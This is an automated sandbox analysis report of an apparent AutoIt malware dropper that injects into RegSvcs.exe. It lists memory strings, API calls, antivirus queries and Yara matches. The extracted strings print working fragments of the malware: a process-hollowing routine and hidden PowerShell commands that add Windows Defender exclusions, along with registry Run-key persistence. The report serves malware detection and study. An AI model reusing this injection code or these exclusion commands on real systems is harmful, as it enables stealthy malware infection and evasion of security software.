Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if $_y0x3856f9c81ce2a45f7b7321a3a0 then _runbinary_fixreloc($_y0x3856f9de03e8ac4574770c, $_y0x3856f9da1ce2a45f7b4034b1a0, $_y0x3856f9de14e2ba5f487d3ca88dd6, $_y0x3856f9de01f7bc59777c34aab1ea36418478817b734bc61d1f0360a489826b, $_y0x3856f9c703e6af597b4b = 523)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "writepro" & "cessmemory", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de14e2ba5f487d3ca88dd6, "ptr", $_y0x3856f9de03e8ac4574770c, "dword_ptr", $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec39371d648da99b77cc25, "dword_ptr*", 0)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("kernel32.dll", "bool", "terminateprocess", "handle", $_y0x3856f9c61ef5a7537d61269f, "dword", 0)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_2c87ca0024d60201\b
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9c70ae2a444794b = $_y0x3856f9de0fe3ac427d6126889cf80e - $_y0x3856f9de0fe3ac427d61268995eb0e
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ci.cataloghint
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s$ci.cataloghint
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft-windows-netfx4-us-oc-package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: omicrosoft-windows-netfx4-us-oc-package~31bf3856ad364e35~amd64~~10.0.17134.1.cat6
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \registry\user\s-1-5-21-3853321935-2125563209-4053062332-1002\software\microsoft\windows nt\currentversion
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: l $_y0x3856f9da1ec28a69 = dllstructcreate("byte inheritedaddressspace;" & "byte readimagefileexecoptions;" & "byte beingdebugged;" & "byte spare;" & "ptr mutant;" & "ptr imagebaseaddress;" & "ptr loaderdata;" & "ptr processparameters;" & "ptr subsystemdata;" & "ptr processheap;" & "ptr fastpeblock;" & "ptr fastpeblockroutine;" & "ptr fastpebunlockroutine;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid")d
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "readprocessmemory", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($_y0x3856f9da1ec28a69, "imagebaseaddress", $_y0x3856f9de14e2ba5f487d3ca88dd6)f
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "writepro" & "cessmemory", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)$
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "e" & "ax", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653)#
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "rcx", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653),
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "setthreadcontext", "handle", $_y0x3856f9c61aefba5579760c, "ptr", dllstructgetptr($_y0x3856f9da0dc886645d4a019f))
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "dword", "resumethread", "handle", $_y0x3856f9c61aefba5579760c)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61ef5a7537d61269f)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61aefba5579760c)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return dllstructgetdata($_y0x3856f9da3ef5a7537d61269990e1314a9367a9627b43cd06, "processid")0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _runbinary_fixreloc($_y0x3856f9de03e8ac4574770c, $_y0x3856f9da0ae6bc5141, $_y0x3856f9de0fe3ac427d6126889cf80e, $_y0x3856f9de0fe3ac427d61268995eb0e, $_y0x3856f9c807eaa9577d4a63f2a0)#
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c71deeb255777417aa96ec3c7c, $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9da0be9ba597d610c, $_y0x3856f9c70ae6bc5141, $_y0x3856f9da0fe3ac427d61269f
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9c708eba95741 = 3 + 7 * $_y0x3856f9c807eaa9577d4a63f2a0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: while $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8 < $_y0x3856f9c71deeb255410
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029 = dllstructcreate("dword virtualaddress; dword sizeofblock", $_y0x3856f9de0ae6bc5141 + $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8)$
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c718eeba446d7339879deb2540927991 = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "virtualaddress")"
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c71deeb255777417aa96ec3c7c = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "sizeofblock")
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f = ($_y0x3856f9c71deeb255777417aa96ec3c7c - 8) / 21
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9da0be9ba597d610c = dllstructcreate("word[" & $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f & "]", dllstructgetptr($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029) + 8)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9c70ae6bc5141 = dllstructgetdata($_y0x3856f9da0be9ba597d610c, 1, $_y0x3856f9c717)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if bitshift($_y0x3856f9c70ae6bc5141, 12) = $_y0x3856f9c708eba95741 then,
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9da0fe3ac427d61269f = dllstructcreate("ptr", $_y0x3856f9de03e8ac4574770c + $_y0x3856f9c718eeba446d7339879deb2540927991 + bitand($_y0x3856f9c70ae6bc5141, 0xfff))"
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($_y0x3856f9da0fe3ac427d61269f, 1, dllstructgetdata($_y0x3856f9da0fe3ac427d61269f, 1) + $_y0x3856f9c70ae2a444794b)"
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _runbinary_allocateexespaceataddress($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f, $_y0x3856f9c71deeb25541):
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x1000, "dword", 64)9
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _runbinary_allocateexespace($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9c71deeb25541)3
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", 0, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)r
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif"
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: next)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endifr
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfuncu
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc`
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _runbinary_unmapviewofsection($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f)r
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("ntdll.dll", "int", "ntunmapviewofsection", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f)p
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "iswow64process", "handle", $_y0x3856f9c61ef5a7537d61269f, "bool*", 0)`
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $binbuffer = dllstructcreate("byte[" & binarylen($binary) & "]")\
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $ret = dllcall("user32.dll", "int", "callwi" & "ndowprocw", "ptr", dllstructgetptr($bufferasm), "ws" & "tr", $sexemodule, "ptr", dllstructgetptr($binbuffer), "int", 0, "int", 0)$
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," -command add-mppreference -exclusionpath " & @scriptdir,"","",@sw_hide)m
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'","","",@sw_hide)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbs'","","",@sw_hide)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbe'","","",@sw_hide)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbs'","","",@sw_hide)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbe'","","",@sw_hide)r
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: btklr
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0xh*5z
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0x6,5
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \rings
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: array
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: exe_c
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: le3t?
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reg_sz
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: runonce0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9f80cd4977c777331a38bd6-
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: arrayslist
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9f80cd4977c777331a38bd6
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scriptdir
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002B1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 7_2_002B1A91
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_00253312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 7_2_00253312
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002BEBB3 mouse_event, 7_2_002BEBB3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002B1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 7_2_002B1EF3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002B13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 7_2_002B13F2
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007228000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000000.395755947.0000000000313000.00000002.00000001.01000000.0000000A.sdmp, boaliim.dat.0.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RegSvcs.exe, 0000000D.00000002.636564713.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.0000000003B3A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.00000000039E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: boaliim.dat Binary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerD$
Source: boaliim.dat, 00000007.00000003.427785381.0000000001872000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managero
Source: boaliim.dat, 00000007.00000003.404297594.000000000180F000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: RegSvcs.exe, 0000000D.00000002.649636221.0000000006E6C000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Managerram Managerp
Source: RegSvcs.exe, 0000000D.00000002.633864809.0000000001ABE000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Managerram Manager
Source: RegSvcs.exe, 0000000D.00000002.652061665.0000000007DBE000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program ManagerJ
Source: ikvvfncnn.bmp.0.dr Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: RegSvcs.exe, 0000000D.00000002.636564713.0000000003B3A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.00000000039E6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000390F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager\2
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000038E7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerx
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000039E6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager4
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000390F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.00000000039B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerHa
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_0096AF0F
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0096F654 cpuid 0_2_0096F654
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0096DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_0096DF1E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_0028BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 7_2_0028BCF2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat Code function: 7_2_002AE5F8 GetUserNameW, 7_2_002AE5F8
Source: C:\Users\user\Desktop\P05jmXYKpr.exe Code function: 0_2_0095B146 GetVersionExW, 0_2_0095B146
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000002.429704985.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425143346.00000000018CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procexp.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000002.429704985.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425143346.00000000018CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information

Source: Yara match File source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE
